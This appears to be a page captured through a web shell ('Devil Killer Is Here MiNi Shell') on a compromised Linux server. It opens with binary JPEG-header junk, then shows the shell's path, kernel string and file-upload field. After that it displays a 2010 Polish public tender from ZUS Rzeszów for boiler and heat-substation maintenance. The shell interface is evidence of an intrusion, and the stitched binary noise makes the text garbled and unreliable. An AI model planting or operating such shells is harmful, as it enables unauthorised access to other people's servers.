JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/104507-N-2010.html

<p class="kh_header"><b>Rzeszów: Wykonywanie przeglądów konserwacyjnych  kotłowni gazowych, węzłów cieplnych instalacji c.o. w budynkach O/ZUS w Rzeszowie i podległych Inspektoratach.</b><br>
<b>Numer ogłoszenia: 104507 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie , Al. Piłsudskiego 12, 35-075 Rzeszów, woj. podkarpackie, tel. 017 8675000, faks 017 8523638.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie przeglądów konserwacyjnych  kotłowni gazowych, węzłów cieplnych instalacji c.o. w budynkach O/ZUS w Rzeszowie i podległych Inspektoratach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Opis przedmiotu zamówienia dla części I zamówienia 
Wykaz urządzeń oraz pełny zakres prac objętych niniejszym zamówieniem :
Przedmiotem zamówienie jest świadczenie usług w zakresie wykonywania przeglądów konserwacyjnych , serwisowania i usuwania awarii  kotłów gazowych, gazowo olejowych  i wymiennikowi znajdujących się w O/ZUS  w Rzeszowie i podległych mu Inspektorach. 
I. Zakres prac do wykonani podczas przeglądów konserwacyjnych kotłów gazowych 
1. Rodzaj urządzenia i instalacji: 
a)   kotły gazowe  WOLF NG-30W-72 - 2 szt., o mocy 30 -36 KW ( I/ZUS Tarnobrzeg) 
b) kocioł gazowy SCHAFER typ DOMOMAX  DXN 127,  o mocy 127 KW ( I/ZUS Leżajsk) 
c) kocioł gazowy VAILLANT typ VKM 96/7-2E, o mocy 62,4/104 KW O/ZUS Siemiradzkiego 10 
d) kocioł gazowo- olejowy VIESSMANN Paromat Triplex o mocy 150-170 KW. (I/ZUS Jarosław) 
e) kotły gazowo- olejowe VIESSMANN Paromat Triplex - 1 szt. o mocy 195-225 KW  JUBAN GAZ - 2 szt., o mocy 105 KW ( I/ZUS Przeworsk) 
2. Zakres prac konserwacyjnych  dla kotłów : 
2.1. Czyszczenie, kontrola i regulacja kompletnego palnika tj. 
a) czyszczenie dysz paliwa 
b) sprawdzenie działania czujnika temperatury i ogranicznika temperatury bezpieczeństwa 
c) kontrola działania układu sterowania 
d) kontrola czujnika ciśnienia powietrza 
e) pomiar prądu jonizacji 
f) konserwacja filtrów w zespole kompaktowym 
2.2. Czyszczenie, kontrola i regulacja kotła wraz z osprzętem tj. 
a) sprawdzenie poprawności działania automatyki, programatorów i regulatorów 
b) sprawdzenie poprawności działania zaworu bezpieczeństwa, ogranicznika poziomu wody 
c) sprawdzenie czystości płomieniówek (ewentualne czyszczenie) 
d) oględziny zewnętrzne płomieniówek 
e) czyszczenie wnętrza kotła ( po zakończeniu sezonu grzewczego) 
2.3. Próbna praca urządzeń i analiza spalin. Ewentualne doregulowanie do ekonomicznych wartości spalania. Sprawdzenie poprawności działania sterowania kotłem 
2.4. Sprawdzenie ciśnienia w naczyniach przeponowych. 
2.5. Sprawdzenie szczelności instalacji gazowej detektorem gazu przed rozpoczęciem sezonu grzewczego, i po jego zakończeniu./ 2 x w roku /    (oddzielny protokół z pomiarów zgodnie z ustawą Prawo Budowlane) 
2.6. Sprawdzenie dysz olejowych (palniki olejowe)  
2.7. Sprawdzenie wkładów filtracyjnych w filtrach oleju. 
2.8. Przegląd i konserwacja instalacji detekcyjnej  gazu. 
2.9. Wykonanie począwszy od przeglądu okresowego w 2010 r. sprawdzenia stanu technicznego kotłów zgodnie z Art. 62 pkt.5 Prawa Budowlanego ( z wyjątkiem kotła gazowego SCHAFER typ DOMOMAX  DXN 127 w I/ZUS Leżajsk) . 
3. W celu zapewnienia prawidłowego stanu technicznego kotłów gazowych, gazowo olejowych przeglądy będą wykonywane 2 razy do roku: przed rozpoczęciem sezonu grzewczego i po jego zakończeniu, w ciągu 10 dni od daty pisemnego lub telefonicznego powiadomienia przez Zamawiającego. Usuwanie awarii i naprawy będą wykonywane na podstawie oddzielnego zamówienia. 
II. Opis przedmiotu zamówienia dla części II - IV zamówienia 
I. Zakres prac do wykonani podczas przeglądów konserwacyjnych wymienikowni ciepła (w części technologicznej , elektrycznej , aparatury kontrolno pomiarowej , automatyki ) 
1. Lokalizacja wymiennikowni: 
a) wymiennikownia znajdująca się w Inspektoracie ZUS w Przemyślu przy ul. Brodzińskiego 6 - część II zamówienia  
b) wymiennikownia znajdująca się w Inspektoracie ZUS w Stalowej Woli przy ul. Popiełuszki 8 - część III zamówienia 
c) wymiennikownia znajdującą się w inspektoracie ZUS w Mielcu przy ul. Sikorskiego 4  - część IV zamówienia 
2.Wykonywanie  konserwacji  urządzeń  węzła  cieplnego  w zakresie: 
a) konserwacja elektronicznych  regulatorów  temperatury i czujników 
b) konserwacja siłowników elektrycznych, zaworów 
c) dobór nastaw regulatorów  i kontroli prawidłowości działania  układów  regulacyjnych 
d) wymiana uszczelek przy  armaturze 
e) konserwacja instalacji elektrycznej siłowej i gniazd elektrycznych 
f) płukanie z oczyszczeniem wymienników ciepła 
3. W celu zapewnienia prawidłowego stanu technicznego  wymiennikowi ciepła przeglądy będą wykonywane 2 razy do roku: przed rozpoczęciem sezonu grzewczego i po jego zakończeniu, w ciągu 10 dni od daty pisemnego lub telefonicznego  powiadomienia przez Zamawiającego.Usuwanie awarii i naprawy będą wykonywane na podstawie oddzielnego zlecenia. 
III. Opis przedmiotu zamówienia dla części V zamówienia  Przedmiotem zamówienia jest świadczenie usług w zakresie wykonywania konserwacji, serwisowania i usuwania awarii wymiennikowni, wewnętrznej instalacji c.o., znajdujących się w O/ZUS w Rzeszowie przy ulicy AL. Piłsudskiego 12 
1. Wymiennikownia ciepła  / w części technologicznej , elektrycznej, aparatury kontrolno-pomiarowej, automatyki / oraz instalacja wewnętrzna c.o.Lokalizacja wymiennikowni: Wymiennikownia ciepła  w  O/ZUS w Rzeszowie Al. Piłsudskiego 12   Zleceniobiorca w ramach wykonywania czynności musi zapewnić ciągłą /całodobową / sprawność wymiennikowni cieplnych /węzłów cieplnych / oraz  wewnętrznej instalacji centralnego ogrzewania. Przed przystąpieniem do okresu grzewczego i po jego zakończeniu Zleceniobiorca zobowiązany jest do wykonania obowiązkowego przeglądu wymiennikowni, w ciągu 10 dni od daty pisemnego lub telefonicznego powiadomienia przez Zamawiającego.  
 2. Warunki napraw awaryjnych. 
2.1. W przypadku wystąpienia awarii, usterki wymiennikowni i instalacji wewnęcznej c.o. w czasie obowiązywania umowy będzie ona usuwana przez Zleceniodawcę w ciągu 24 godzin licząc od chwili zgłoszenia awarii, usterki przez Zleceniodawcę. W sytuacjach wyjątkowych za zgodą obu stron umowy dopuszcza się inny sposób załatwienia sprawy niż wyżej opisany. 
2.2. W przypadku awarii Zleceniobiorca zobowiązany jest zabezpieczyć miejsce jej wystąpienia w sposób uniemożliwiający zalewanie pomieszczenia, w którym ona nastąpiła jak i pomieszczeń narażonych na zalanie. 
2.3. Po usunięciu awarii, usterki Zleceniobiorca zagwarantuje prawidłowe parametry jakościowe działania urządzeń grzewczych wraz z osprzętem znajdującym się w kotłowni , wymiennikowni i wewnętrznej instalacji co. 
2.4. Na wymienione części Zleceniobiorca udzieli gwarancji w wymiarze podobnym przez producenta jednak nie mniejszym niż 12 miesięcy. 
2.5. Zleceniobiorca wykonanie czynności związanych z konserwacją, przeglądami lub naprawami potwierdzi odpowiednim protokołem. 
2.6. Datę wykonania przeglądu przed okresem grzewczym Zleceniodawca uzgodni z  pracownikami komórki Administracyjno -Gospodarczej w O/ZUS. 
3. Zleceniodawca zapewni obecność swojego pracownika podczas wykonywania prac związanych z realizacją umowy. Po godzinach pracy Zleceniodawcy wszystkie czynności związane z realizacją przedmiotu zamówienia będą wykonywane tylko w obecności upoważnionego pracownika Zleceniodawcy.   
4.  W trakcie wykonywania robót Zleceniobiorca zobowiązany jest do zabezpieczenia terenu prac przed zanieczyszczeniami i uszkodzeniami, i składania wszelkich urządzeń pomocniczych, zbędnych materiałów oraz odpadów i śmieci, związanych  z wykonywanymi pracami i usługami w miejscach wskazanych przez pracownika O/ZUS.   
5. Zleceniobiorca po skończeniu prac zobowiązany jest posprzątać teren robót, usunąć z obiektu i terenu prac wszystkie odpadki i opakowania pozostałe po wykonaniu robót. W przypadku nie posprzątania terenu robót, Zleceniodawca posprząta teren robót a  kosztami obciąży Zleceniodawcę.  
6. Zleceniobiorca zobowiązany jest w ramach wynagrodzenia do prowadzenia analizy pracy wymiennikowni wraz z korektą  nastaw regulatorów temperatury. Korekta na specjalne życzenie Odbiorcy wykonana będzie odpłatnie. 
Sposób obliczania ceny oferty 
1. Wykonawca w przedstawionej ofercie cenowej winien zaoferować cenę wyrażoną w złotych polskich (PLN) kompletną, jednoznaczną  i ostateczną łącznie z podatkiem VAT naliczonym zgodnie z obowiązującymi przepisami w tym zakresie. 2. Wszelkie, ewentualne, udzielone przez Wykonawcę rabaty, bonifikaty, promocje, upusty muszą być uwzględnione w cenie oferty 
3. Cena oferty (w części i - IV zamówienia) musi i obejmować wszelkie koszty związane z realizacją przedmiotu umowy, z konserwacją, przeglądami i dojazdami. 4. Cena miesięcznego ryczałtu za świadczenie usług będących przedmiotem części V zamówienia powinna zawierać wszelkie koszty związane z konserwacją, przeglądami, naprawami i dojazdami , koszty materiałów, urządzeń  i części  zamiennych  użytych  do naprawy , konserwacji i przeglądów. Kwota ta obejmuje także wszelkie koszty związane z realizacją niniejszej umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.53.11.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca dysponuje lub będzie dysponował co najmniej jedną osobą uczestniczącą w wykonaniu zamówienia, posiadającą uprawnienia (kwalifikacje) w zakresie obsługi, konserwacji, remontów, montażu kontrolno - pomiarowym w zakresie obsługiwanych urządzeń i instalacji określonych w przedmiocie zamówienia (Rozporządzenie Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczególnych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci. Dz.U. z dnia 21 maja 2003r). Dotyczy części I - V zamówienia
2. Wykonawca dysponuje lub będzie dysponował co najmniej jedną osobą uczestniczącą w wykonaniu zamówienia, posiadającą uprawnienia (kwalifikacje) do sprawdzania stanu technicznego kotłów (art. 62 ust. 1 pkt. 5 Prawa Budowlanego) oraz do kontroli instalacji gazowych (art. 62 ust. 1 pkt. 1c Prawa Budowlanego) w zakresie obsługiwanych urządzeń i instalacji określonych w przedmiocie zamówienia. Dotyczy części I zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie Al.Piłsudskiego 12 , 35-075 Rzeszów (ul. Siemiradzkiego 8 pok. nr 1).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2010 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie Al.Piłsudskiego 12 , 35-075 Rzeszów pok. Nr 23 - Dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Serwis kotłów gazowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac do wykonani podczas przeglądów konserwacyjnych kotłów gazowych 1. Rodzaj urządzenia i instalacji: 
a)   kotły gazowe  WOLF NG-30W-72 - 2 szt., o mocy 30 -36 KW ( I/ZUS Tarnobrzeg) 
b) kocioł gazowy SCHAFER typ DOMOMAX  DXN 127,  o mocy 127 KW ( I/ZUS Leżajsk) 
c) kocioł gazowy VAILLANT typ VKM 96/7-2E, o mocy 62,4/104 KW O/ZUS Siemiradzkiego 10 
d) kocioł gazowo- olejowy VIESSMANN Paromat Triplex o mocy 150-170 KW. (I/ZUS Jarosław) 
e) kotły gazowo- olejowe VIESSMANN Paromat Triplex - 1 szt. o mocy 195-225 KW  JUBAN GAZ - 2 szt., o mocy 105 KW ( I/ZUS Przeworsk) 
2. Zakres prac konserwacyjnych  dla kotłów : 
2.1. Czyszczenie, kontrola i regulacja kompletnego palnika tj. 
a) czyszczenie dysz paliwa 
b) sprawdzenie działania czujnika temperatury i ogranicznika temperatury bezpieczeństwa 
c) kontrola działania układu sterowania 
d) kontrola czujnika ciśnienia powietrza 
e) pomiar prądu jonizacji 
f) konserwacja filtrów w zespole kompaktowym 
2.2. Czyszczenie, kontrola i regulacja kotła wraz z osprzętem tj. 
a) sprawdzenie poprawności działania automatyki, programatorów i regulatorów 
b) sprawdzenie poprawności działania zaworu bezpieczeństwa, ogranicznika poziomu wody 
c) sprawdzenie czystości płomieniówek (ewentualne czyszczenie) 
d) oględziny zewnętrzne płomieniówek 
e) czyszczenie wnętrza kotła ( po zakończeniu sezonu grzewczego) 
2.3. Próbna praca urządzeń i analiza spalin. Ewentualne doregulowanie do ekonomicznych wartości spalania. Sprawdzenie poprawności działania sterowania kotłem 
2.4. Sprawdzenie ciśnienia w naczyniach przeponowych. 
2.5. Sprawdzenie szczelności instalacji gazowej detektorem gazu przed rozpoczęciem sezonu grzewczego, i po jego zakończeniu./ 2 x w roku /    (oddzielny protokół z pomiarów zgodnie z ustawą Prawo Budowlane) 
2.6. Sprawdzenie dysz olejowych (palniki olejowe)  
2.7. Sprawdzenie wkładów filtracyjnych w filtrach oleju. 
2.8. Przegląd i konserwacja instalacji detekcyjnej  gazu. 
2.9. Wykonanie począwszy od przeglądu okresowego w 2010 r. sprawdzenia stanu technicznego kotłów zgodnie z Art. 62 pkt.5 Prawa Budowlanego ( z wyjątkiem kotła gazowego SCHAFER typ DOMOMAX  DXN 127 w I/ZUS Leżajsk) . 
3. W celu zapewnienia prawidłowego stanu technicznego kotłów gazowych, gazowo olejowych  przeglądy będą wykonywane 2 razy do roku: przed rozpoczęciem sezonu grzewczego i po jego zakończeniu, w ciągu 10 dni od daty pisemnego lub telefonicznego powiadomienia przez Zamawiającego. Usuwanie awarii i naprawy będą wykonywane na podstawie oddzielnego zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Serwis wymiennikowni w I/ZUS w Przemyślu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Zakres prac do wykonani podczas przeglądów konserwacyjnych wymienikowni ciepła (w części technologicznej , elektrycznej , aparatury kontrolno pomiarowej , automatyki ) 
1. Lokalizacja wymiennikowni wymiennikownia znajdująca się w Inspektoracie ZUS w Przemyślu przy ul. Brodzińskiego 6 ,
2.Wykonywanie  konserwacji  urządzeń  węzła  cieplnego  w zakresie: 
a) konserwacja elektronicznych  regulatorów  temperatury i czujników 
b) konserwacja siłowników elektrycznych, zaworów 
c) dobór nastaw regulatorów i kontroli prawidłowości działania  układów  regulacyjnych d) wymiana uszczelek przy  armaturze 
e) konserwacja instalacji elektrycznej siłowej i gniazd elektrycznych 
f) płukanie z oczyszczeniem wymienników ciepła 
3. W celu zapewnienia prawidłowego stanu technicznego  wymiennikowi ciepła przeglądy będą wykonywane 2 razy do roku: przed rozpoczęciem sezonu grzewczego i po jego zakończeniu, w ciągu 10 dni od daty pisemnego lub telefonicznego  powiadomienia przez Zamawiającego.Usuwanie awarii i naprawy będą wykonywane na podstawie oddzielnego zlecenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Serwis wymiennikowni w Inspektoracie ZUS w Stalowej Woli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Zakres prac do wykonani podczas przeglądów konserwacyjnych wymienikowni ciepła (w części technologicznej , elektrycznej , aparatury kontrolno pomiarowej , automatyki ) 
1. Lokalizacja wymiennikowni wymiennikownia znajdująca się w Inspektoracie ZUS w Stalowej Woli przy ul. Popiełuszki 8 ,
2.Wykonywanie  konserwacji  urządzeń  węzła  cieplnego  w zakresie: 
a) konserwacja elektronicznych  regulatorów  temperatury i czujników 
b) konserwacja siłowników elektrycznych, zaworów 
c) dobór nastaw regulatorów i kontroli prawidłowości działania  układów  regulacyjnych d) wymiana uszczelek przy  armaturze 
e) konserwacja instalacji elektrycznej siłowej i gniazd elektrycznych 
f) płukanie z oczyszczeniem wymienników ciepła 
3. W celu zapewnienia prawidłowego stanu technicznego  wymiennikowi ciepła przeglądy będą wykonywane 2 razy do roku: przed rozpoczęciem sezonu grzewczego i po jego zakończeniu, w ciągu 10 dni od daty pisemnego lub telefonicznego  powiadomienia przez Zamawiającego.Usuwanie awarii i naprawy będą wykonywane na podstawie oddzielnego zlecenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
